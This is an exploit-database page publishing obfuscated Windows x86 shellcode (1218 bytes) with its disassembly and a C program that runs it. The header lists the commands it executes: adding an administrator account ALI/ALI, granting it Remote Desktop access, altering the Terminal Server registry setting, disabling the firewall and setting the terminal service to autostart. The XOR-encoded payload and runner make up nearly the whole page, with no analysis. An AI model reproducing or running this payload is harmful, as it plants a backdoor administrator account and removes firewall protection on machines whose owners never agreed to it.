Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP



EKU-ID: 4523 CVE: OSVDB-ID:
Author: Ali Razmjoo Published: 2015-01-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#Author: Ali Razmjoo
​​#Title: ​Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]

Obfuscated Shellcode Windows x86 [1218 Bytes].c

/*
#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
#length: 1218 bytes
#Date: 13 January 2015
#Author: Ali Razmjoo
#tested On: Windows 7 x86 ultimate

WinExec =>  0x7666e695
ExitProcess =>  0x76632acf
====================================
Execute :
net user ALI ALI /add
net localgroup Administrators ALI /add
NET LOCALGROUP "Remote Desktop Users" ALI /add 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
netsh firewall set opmode disable
sc config termservice start= auto
====================================



Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']

Thanks to my friends , Dariush Nasirpour and Ehsan Nezami


C:\Users\Ali\Desktop>objdump -D shellcode.o

shellcode.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   31 c0                   xor    %eax,%eax
   2:   50                      push   %eax
   3:   b8 41 41 41 64          mov    $0x64414141,%eax
   8:   c1 e8 08                shr    $0x8,%eax
   b:   c1 e8 08                shr    $0x8,%eax
   e:   c1 e8 08                shr    $0x8,%eax
  11:   50                      push   %eax
  12:   b9 6d 76 53 52          mov    $0x5253766d,%ecx
  17:   ba 4d 59 32 36          mov    $0x3632594d,%edx
  1c:   31 d1                   xor    %edx,%ecx
  1e:   51                      push   %ecx
  1f:   b9 6e 72 61 71          mov    $0x7161726e,%ecx
  24:   ba 4e 33 2d 38          mov    $0x382d334e,%edx
  29:   31 d1                   xor    %edx,%ecx
  2b:   51                      push   %ecx
  2c:   b9 6c 75 78 78          mov    $0x7878756c,%ecx
  31:   ba 4c 34 34 31          mov    $0x3134344c,%edx
  36:   31 d1                   xor    %edx,%ecx
  38:   51                      push   %ecx
  39:   b9 46 47 57 46          mov    $0x46574746,%ecx
  3e:   ba 33 34 32 34          mov    $0x34323433,%edx
  43:   31 d1                   xor    %edx,%ecx
  45:   51                      push   %ecx
  46:   b9 56 50 47 64          mov    $0x64475056,%ecx
  4b:   ba 38 35 33 44          mov    $0x44333538,%edx
  50:   31 d1                   xor    %edx,%ecx
  52:   51                      push   %ecx
  53:   89 e0                   mov    %esp,%eax
  55:   bb 41 41 41 01          mov    $0x1414141,%ebx
  5a:   c1 eb 08                shr    $0x8,%ebx
  5d:   c1 eb 08                shr    $0x8,%ebx
  60:   c1 eb 08                shr    $0x8,%ebx
  63:   53                      push   %ebx
  64:   50                      push   %eax
  65:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
  6a:   ba 33 52 64 59          mov    $0x59645233,%edx
  6f:   31 d3                   xor    %edx,%ebx
  71:   ff d3                   call   *%ebx
  73:   31 c0                   xor    %eax,%eax
  75:   50                      push   %eax
  76:   68 41 41 64 64          push   $0x64644141
  7b:   58                      pop    %eax
  7c:   c1 e8 08                shr    $0x8,%eax
  7f:   c1 e8 08                shr    $0x8,%eax
  82:   50                      push   %eax
  83:   b9 01 41 60 32          mov    $0x32604101,%ecx
  88:   ba 48 61 4f 53          mov    $0x534f6148,%edx
  8d:   31 d1                   xor    %edx,%ecx
  8f:   51                      push   %ecx
  90:   b9 28 47 0d 2f          mov    $0x2f0d4728,%ecx
  95:   ba 5b 67 4c 63          mov    $0x634c675b,%edx
  9a:   31 d1                   xor    %edx,%ecx
  9c:   51                      push   %ecx
  9d:   b9 03 24 36 21          mov    $0x21362403,%ecx
  a2:   ba 62 50 59 53          mov    $0x53595062,%edx
  a7:   31 d1                   xor    %edx,%ecx
  a9:   51                      push   %ecx
  aa:   b9 34 41 15 18          mov    $0x18154134,%ecx
  af:   ba 5d 32 61 6a          mov    $0x6a61325d,%edx
  b4:   31 d1                   xor    %edx,%ecx
  b6:   51                      push   %ecx
  b7:   b9 0c 05 1b 25          mov    $0x251b050c,%ecx
  bc:   ba 68 68 72 4b          mov    $0x4b726868,%edx
  c1:   31 d1                   xor    %edx,%ecx
  c3:   51                      push   %ecx
  c4:   b9 2f 27 7b 13          mov    $0x137b272f,%ecx
  c9:   ba 5a 57 5b 52          mov    $0x525b575a,%edx
  ce:   31 d1                   xor    %edx,%ecx
  d0:   51                      push   %ecx
  d1:   b9 1c 2c 02 3e          mov    $0x3e022c1c,%ecx
  d6:   ba 70 4b 70 51          mov    $0x51704b70,%edx
  db:   31 d1                   xor    %edx,%ecx
  dd:   51                      push   %ecx
  de:   b9 3d 2a 32 4c          mov    $0x4c322a3d,%ecx
  e3:   ba 51 45 51 2d          mov    $0x2d514551,%edx
  e8:   31 d1                   xor    %edx,%ecx
  ea:   51                      push   %ecx
  eb:   b9 23 5c 1c 19          mov    $0x191c5c23,%ecx
  f0:   ba 4d 39 68 39          mov    $0x3968394d,%edx
  f5:   31 d1                   xor    %edx,%ecx
  f7:   51                      push   %ecx
  f8:   89 e0                   mov    %esp,%eax
  fa:   bb 41 41 41 01          mov    $0x1414141,%ebx
  ff:   c1 eb 08                shr    $0x8,%ebx
102:   c1 eb 08                shr    $0x8,%ebx
105:   c1 eb 08                shr    $0x8,%ebx
108:   53                      push   %ebx
109:   50                      push   %eax
10a:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
10f:   ba 33 52 64 59          mov    $0x59645233,%edx
114:   31 d3                   xor    %edx,%ebx
116:   ff d3                   call   *%ebx
118:   31 c0                   xor    %eax,%eax
11a:   50                      push   %eax
11b:   68 41 41 64 64          push   $0x64644141
120:   58                      pop    %eax
121:   c1 e8 08                shr    $0x8,%eax
124:   c1 e8 08                shr    $0x8,%eax
127:   50                      push   %eax
128:   b9 02 63 6b 35          mov    $0x356b6302,%ecx
12d:   ba 4b 43 44 54          mov    $0x5444434b,%edx
132:   31 d1                   xor    %edx,%ecx
134:   51                      push   %ecx
135:   b9 61 55 6c 3d          mov    $0x3d6c5561,%ecx
13a:   ba 43 75 2d 71          mov    $0x712d7543,%edx
13f:   31 d1                   xor    %edx,%ecx
141:   51                      push   %ecx
142:   b9 27 3f 3b 1a          mov    $0x1a3b3f27,%ecx
147:   ba 54 5a 49 69          mov    $0x69495a54,%edx
14c:   31 d1                   xor    %edx,%ecx
14e:   51                      push   %ecx
14f:   b9 25 34 12 67          mov    $0x67123425,%ecx
154:   ba 4a 44 32 32          mov    $0x3232444a,%edx
159:   31 d1                   xor    %edx,%ecx
15b:   51                      push   %ecx
15c:   b9 0b 02 1f 19          mov    $0x191f020b,%ecx
161:   ba 6e 71 74 6d          mov    $0x6d74716e,%edx
166:   31 d1                   xor    %edx,%ecx
168:   51                      push   %ecx
169:   b9 39 3f 7b 15          mov    $0x157b3f39,%ecx
16e:   ba 4d 5a 5b 51          mov    $0x515b5a4d,%edx
173:   31 d1                   xor    %edx,%ecx
175:   51                      push   %ecx
176:   b9 35 15 03 2a          mov    $0x2a031535,%ecx
17b:   ba 67 70 6e 45          mov    $0x456e7067,%edx
180:   31 d1                   xor    %edx,%ecx
182:   51                      push   %ecx
183:   b9 3a 17 75 46          mov    $0x4675173a,%ecx
188:   ba 6f 47 55 64          mov    $0x6455476f,%edx
18d:   31 d1                   xor    %edx,%ecx
18f:   51                      push   %ecx
190:   b9 26 35 0b 1e          mov    $0x1e0b3526,%ecx
195:   ba 6a 72 59 51          mov    $0x5159726a,%edx
19a:   31 d1                   xor    %edx,%ecx
19c:   51                      push   %ecx
19d:   b9 2a 2a 06 2a          mov    $0x2a062a2a,%ecx
1a2:   ba 66 65 45 6b          mov    $0x6b456566,%edx
1a7:   31 d1                   xor    %edx,%ecx
1a9:   51                      push   %ecx
1aa:   b9 1d 20 35 5a          mov    $0x5a35201d,%ecx
1af:   ba 53 65 61 7a          mov    $0x7a616553,%edx
1b4:   31 d1                   xor    %edx,%ecx
1b6:   51                      push   %ecx
1b7:   89 e0                   mov    %esp,%eax
1b9:   bb 41 41 41 01          mov    $0x1414141,%ebx
1be:   c1 eb 08                shr    $0x8,%ebx
1c1:   c1 eb 08                shr    $0x8,%ebx
1c4:   c1 eb 08                shr    $0x8,%ebx
1c7:   53                      push   %ebx
1c8:   50                      push   %eax
1c9:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
1ce:   ba 33 52 64 59          mov    $0x59645233,%edx
1d3:   31 d3                   xor    %edx,%ebx
1d5:   ff d3                   call   *%ebx
1d7:   31 c0                   xor    %eax,%eax
1d9:   50                      push   %eax
1da:   b9 09 4c 7c 5e          mov    $0x5e7c4c09,%ecx
1df:   ba 38 6c 53 38          mov    $0x38536c38,%edx
1e4:   31 d1                   xor    %edx,%ecx
1e6:   51                      push   %ecx
1e7:   b9 42 4d 39 14          mov    $0x14394d42,%ecx
1ec:   ba 62 62 5d 34          mov    $0x345d6262,%edx
1f1:   31 d1                   xor    %edx,%ecx
1f3:   51                      push   %ecx
1f4:   b9 7a 24 26 75          mov    $0x7526247a,%ecx
1f9:   ba 2d 6b 74 31          mov    $0x31746b2d,%edx
1fe:   31 d1                   xor    %edx,%ecx
200:   51                      push   %ecx
201:   b9 1d 30 15 28          mov    $0x2815301d,%ecx
206:   ba 58 77 4a 6c          mov    $0x6c4a7758,%edx
20b:   31 d1                   xor    %edx,%ecx
20d:   51                      push   %ecx
20e:   b9 7c 2f 57 16          mov    $0x16572f7c,%ecx
213:   ba 53 5b 77 44          mov    $0x44775b53,%edx
218:   31 d1                   xor    %edx,%ecx
21a:   51                      push   %ecx
21b:   b9 42 25 2a 66          mov    $0x662a2542,%ecx
220:   ba 2d 4b 59 46          mov    $0x46594b2d,%edx
225:   31 d1                   xor    %edx,%ecx
227:   51                      push   %ecx
228:   b9 28 2f 0c 5a          mov    $0x5a0c2f28,%ecx
22d:   ba 4d 4c 78 33          mov    $0x33784c4d,%edx
232:   31 d1                   xor    %edx,%ecx
234:   51                      push   %ecx
235:   b9 20 2b 26 26          mov    $0x26262b20,%ecx
23a:   ba 63 44 48 48          mov    $0x48484463,%edx
23f:   31 d1                   xor    %edx,%ecx
241:   51                      push   %ecx
242:   b9 08 2b 23 67          mov    $0x67232b08,%ecx
247:   ba 66 52 77 34          mov    $0x34775266,%edx
24c:   31 d1                   xor    %edx,%ecx
24e:   51                      push   %ecx
24f:   b9 49 1c 2e 48          mov    $0x482e1c49,%ecx
254:   ba 69 7a 6a 2d          mov    $0x2d6a7a69,%edx
259:   31 d1                   xor    %edx,%ecx
25b:   51                      push   %ecx
25c:   b9 67 67 1d 37          mov    $0x371d6767,%ecx
261:   ba 45 47 32 41          mov    $0x41324745,%edx
266:   31 d1                   xor    %edx,%ecx
268:   51                      push   %ecx
269:   b9 03 33 0d 3b          mov    $0x3b0d3303,%ecx
26e:   ba 71 45 68 49          mov    $0x49684571,%edx
273:   31 d1                   xor    %edx,%ecx
275:   51                      push   %ecx
276:   b9 39 6a 3c 2f          mov    $0x2f3c6a39,%ecx
27b:   ba 55 4a 6f 4a          mov    $0x4a6f4a55,%edx
280:   31 d1                   xor    %edx,%ecx
282:   51                      push   %ecx
283:   b9 37 44 1f 2e          mov    $0x2e1f4437,%ecx
288:   ba 5a 2d 71 4f          mov    $0x4f712d5a,%edx
28d:   31 d1                   xor    %edx,%ecx
28f:   51                      push   %ecx
290:   b9 34 23 23 3b          mov    $0x3b232334,%ecx
295:   ba 68 77 46 49          mov    $0x49467768,%edx
29a:   31 d1                   xor    %edx,%ecx
29c:   51                      push   %ecx
29d:   b9 07 3a 0a 14          mov    $0x140a3a07,%ecx
2a2:   ba 73 48 65 78          mov    $0x78654873,%edx
2a7:   31 d1                   xor    %edx,%ecx
2a9:   51                      push   %ecx
2aa:   b9 14 2e 58 53          mov    $0x53582e14,%ecx
2af:   ba 48 6d 37 3d          mov    $0x3d376d48,%edx
2b4:   31 d1                   xor    %edx,%ecx
2b6:   51                      push   %ecx
2b7:   b9 3e 3d 26 32          mov    $0x32263d3e,%ecx
2bc:   ba 52 6e 43 46          mov    $0x46436e52,%edx
2c1:   31 d1                   xor    %edx,%ecx
2c3:   51                      push   %ecx
2c4:   b9 33 3c 35 34          mov    $0x34353c33,%ecx
2c9:   ba 5d 48 47 5b          mov    $0x5b47485d,%edx
2ce:   31 d1                   xor    %edx,%ecx
2d0:   51                      push   %ecx
2d1:   b9 36 0e 07 2b          mov    $0x2b070e36,%ecx
2d6:   ba 58 7a 44 44          mov    $0x44447a58,%edx
2db:   31 d1                   xor    %edx,%ecx
2dd:   51                      push   %ecx
2de:   b9 3c 10 0a 37          mov    $0x370a103c,%ecx
2e3:   ba 49 62 78 52          mov    $0x52786249,%edx
2e8:   31 d1                   xor    %edx,%ecx
2ea:   51                      push   %ecx
2eb:   b9 24 7c 3b 36          mov    $0x363b7c24,%ecx
2f0:   ba 61 31 67 75          mov    $0x75673161,%edx
2f5:   31 d1                   xor    %edx,%ecx
2f7:   51                      push   %ecx
2f8:   b9 31 3d 3b 27          mov    $0x273b3d31,%ecx
2fd:   ba 62 64 68 73          mov    $0x73686462,%edx
302:   31 d1                   xor    %edx,%ecx
304:   51                      push   %ecx
305:   b9 7f 7d 3d 35          mov    $0x353d7d7f,%ecx
30a:   ba 36 33 78 69          mov    $0x69783336,%edx
30f:   31 d1                   xor    %edx,%ecx
311:   51                      push   %ecx
312:   b9 7c 13 0f 2f          mov    $0x2f0f137c,%ecx
317:   ba 31 52 4c 67          mov    $0x674c5231,%edx
31c:   31 d1                   xor    %edx,%ecx
31e:   51                      push   %ecx
31f:   b9 1b 08 35 2d          mov    $0x2d35081b,%ecx
324:   ba 58 49 79 72          mov    $0x72794958,%edx
329:   31 d1                   xor    %edx,%ecx
32b:   51                      push   %ecx
32c:   b9 74 3a 1e 21          mov    $0x211e3a74,%ecx
331:   ba 2d 65 52 6e          mov    $0x6e52652d,%edx
336:   31 d1                   xor    %edx,%ecx
338:   51                      push   %ecx
339:   b9 16 10 1f 17          mov    $0x171f1016,%ecx
33e:   ba 34 58 54 52          mov    $0x52545834,%edx
343:   31 d1                   xor    %edx,%ecx
345:   51                      push   %ecx
346:   b9 2f 27 0c 6e          mov    $0x6e0c272f,%ecx
34b:   ba 4e 43 68 4e          mov    $0x4e68434e,%edx
350:   31 d1                   xor    %edx,%ecx
352:   51                      push   %ecx
353:   b9 39 22 5e 50          mov    $0x505e2239,%ecx
358:   ba 4b 47 39 70          mov    $0x7039474b,%edx
35d:   31 d1                   xor    %edx,%ecx
35f:   51                      push   %ecx
360:   89 e0                   mov    %esp,%eax
362:   bb 41 41 41 01          mov    $0x1414141,%ebx
367:   c1 eb 08                shr    $0x8,%ebx
36a:   c1 eb 08                shr    $0x8,%ebx
36d:   c1 eb 08                shr    $0x8,%ebx
370:   53                      push   %ebx
371:   50                      push   %eax
372:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
377:   ba 33 52 64 59          mov    $0x59645233,%edx
37c:   31 d3                   xor    %edx,%ebx
37e:   ff d3                   call   *%ebx
380:   31 c0                   xor    %eax,%eax
382:   50                      push   %eax
383:   b8 41 41 41 65          mov    $0x65414141,%eax
388:   c1 e8 08                shr    $0x8,%eax
38b:   c1 e8 08                shr    $0x8,%eax
38e:   c1 e8 08                shr    $0x8,%eax
391:   50                      push   %eax
392:   b9 1e 53 39 3c          mov    $0x3c39531e,%ecx
397:   ba 6d 32 5b 50          mov    $0x505b326d,%edx
39c:   31 d1                   xor    %edx,%ecx
39e:   51                      push   %ecx
39f:   b9 04 66 2f 32          mov    $0x322f6604,%ecx
3a4:   ba 61 46 4b 5b          mov    $0x5b4b4661,%edx
3a9:   31 d1                   xor    %edx,%ecx
3ab:   51                      push   %ecx
3ac:   b9 19 1e 0d 11          mov    $0x110d1e19,%ecx
3b1:   ba 69 73 62 75          mov    $0x75627369,%edx
3b6:   31 d1                   xor    %edx,%ecx
3b8:   51                      push   %ecx
3b9:   b9 20 41 47 36          mov    $0x36474120,%ecx
3be:   ba 45 35 67 59          mov    $0x59673545,%edx
3c3:   31 d1                   xor    %edx,%ecx
3c5:   51                      push   %ecx
3c6:   b9 2b 05 64 2a          mov    $0x2a64052b,%ecx
3cb:   ba 47 69 44 59          mov    $0x59446947,%edx
3d0:   31 d1                   xor    %edx,%ecx
3d2:   51                      push   %ecx
3d3:   b9 10 3f 4f 22          mov    $0x224f3f10,%ecx
3d8:   ba 62 5a 38 43          mov    $0x43385a62,%edx
3dd:   31 d1                   xor    %edx,%ecx
3df:   51                      push   %ecx
3e0:   b9 2a 6f 2a 24          mov    $0x242a6f2a,%ecx
3e5:   ba 42 4f 4c 4d          mov    $0x4d4c4f42,%edx
3ea:   31 d1                   xor    %edx,%ecx
3ec:   51                      push   %ecx
3ed:   b9 29 09 1e 5e          mov    $0x5e1e0929,%ecx
3f2:   ba 47 6c 6a 2d          mov    $0x2d6a6c47,%edx
3f7:   31 d1                   xor    %edx,%ecx
3f9:   51                      push   %ecx
3fa:   89 e0                   mov    %esp,%eax
3fc:   bb 41 41 41 01          mov    $0x1414141,%ebx
401:   c1 eb 08                shr    $0x8,%ebx
404:   c1 eb 08                shr    $0x8,%ebx
407:   c1 eb 08                shr    $0x8,%ebx
40a:   53                      push   %ebx
40b:   50                      push   %eax
40c:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
411:   ba 33 52 64 59          mov    $0x59645233,%edx
416:   31 d3                   xor    %edx,%ebx
418:   ff d3                   call   *%ebx
41a:   31 c0                   xor    %eax,%eax
41c:   50                      push   %eax
41d:   b8 41 41 41 6f          mov    $0x6f414141,%eax
422:   c1 e8 08                shr    $0x8,%eax
425:   c1 e8 08                shr    $0x8,%eax
428:   c1 e8 08                shr    $0x8,%eax
42b:   50                      push   %eax
42c:   b9 72 2a 05 39          mov    $0x39052a72,%ecx
431:   ba 52 4b 70 4d          mov    $0x4d704b52,%edx
436:   31 d1                   xor    %edx,%ecx
438:   51                      push   %ecx
439:   b9 54 3a 05 52          mov    $0x52053a54,%ecx
43e:   ba 35 48 71 6f          mov    $0x6f714835,%edx
443:   31 d1                   xor    %edx,%ecx
445:   51                      push   %ecx
446:   b9 29 16 0a 47          mov    $0x470a1629,%ecx
44b:   ba 4c 36 79 33          mov    $0x3379364c,%edx
450:   31 d1                   xor    %edx,%ecx
452:   51                      push   %ecx
453:   b9 27 1b 5b 3e          mov    $0x3e5b1b27,%ecx
458:   ba 55 6d 32 5d          mov    $0x5d326d55,%edx
45d:   31 d1                   xor    %edx,%ecx
45f:   51                      push   %ecx
460:   b9 33 1a 3b 10          mov    $0x103b1a33,%ecx
465:   ba 41 77 48 75          mov    $0x75487741,%edx
46a:   31 d1                   xor    %edx,%ecx
46c:   51                      push   %ecx
46d:   b9 34 79 3a 12          mov    $0x123a7934,%ecx
472:   ba 53 59 4e 77          mov    $0x774e5953,%edx
477:   31 d1                   xor    %edx,%ecx
479:   51                      push   %ecx
47a:   b9 1d 5c 1e 28          mov    $0x281e5c1d,%ecx
47f:   ba 72 32 78 41          mov    $0x41783272,%edx
484:   31 d1                   xor    %edx,%ecx
486:   51                      push   %ecx
487:   b9 2a 4e 5a 28          mov    $0x285a4e2a,%ecx
48c:   ba 59 2d 7a 4b          mov    $0x4b7a2d59,%edx
491:   31 d1                   xor    %edx,%ecx
493:   51                      push   %ecx
494:   89 e0                   mov    %esp,%eax
496:   bb 41 41 41 01          mov    $0x1414141,%ebx
49b:   c1 eb 08                shr    $0x8,%ebx
49e:   c1 eb 08                shr    $0x8,%ebx
4a1:   c1 eb 08                shr    $0x8,%ebx
4a4:   53                      push   %ebx
4a5:   50                      push   %eax
4a6:   bb a6 b4 02 2f          mov    $0x2f02b4a6,%ebx
4ab:   ba 33 52 64 59          mov    $0x59645233,%edx
4b0:   31 d3                   xor    %edx,%ebx
4b2:   ff d3                   call   *%ebx
4b4:   bb f9 7e 5e 22          mov    $0x225e7ef9,%ebx
4b9:   ba 36 54 3d 54          mov    $0x543d5436,%edx
4be:   31 d3                   xor    %edx,%ebx
4c0:   ff d3                   call   *%ebx


*/

#include <stdio.h>
#include <string.h>

int main(){
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
}